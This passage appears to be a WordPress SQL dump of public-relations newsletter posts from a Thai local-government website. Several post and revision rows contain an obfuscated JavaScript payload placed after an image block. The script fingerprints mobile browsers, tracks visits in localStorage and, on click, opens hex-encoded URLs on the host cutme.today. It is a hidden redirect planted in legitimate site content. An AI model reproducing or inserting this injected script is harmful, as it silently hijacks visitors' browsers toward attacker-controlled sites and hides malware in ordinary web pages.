_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-9','','','2024-07-27 22:44:22','2024-07-27 15:44:22','',0,'http://pakhaeng.ssk.in.th/?p=212',0,'post','',0),
(213,1,'2024-07-27 22:44:09','2024-07-27 15:44:09','','8-2566','','inherit','','closed','','8-2566-2','','','2024-07-27 22:44:09','2024-07-27 15:44:09','',212,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/8-2566-1.png',0,'attachment','image/png',0),
(214,1,'2024-07-27 22:44:20','2024-07-27 15:44:20','<!-- wp:image {\"id\":213,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/8-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-213\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','212-revision-v1','','','2024-07-27 22:44:20','2024-07-27 15:44:20','',212,'http://pakhaeng.ssk.in.th/?p=214',0,'revision','',0),
(215,1,'2024-07-27 22:44:50','2024-07-27 15:44:50','<!-- wp:image {\"id\":216,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/9-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-216\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-10','','','2024-07-27 22:44:52','2024-07-27 15:44:52','',0,'http://pakhaeng.ssk.in.th/?p=215',0,'post','',0),
(216,1,'2024-07-27 22:44:38','2024-07-27 15:44:38','','9-2566','','inherit','','closed','','9-2566-2','','','2024-07-27 22:44:38','2024-07-27 15:44:38','',215,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/9-2566-1.png',0,'attachment','image/png',0),
(217,1,'2024-07-27 22:44:50','2024-07-27 15:44:50','<!-- wp:image {\"id\":216,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/9-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-216\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\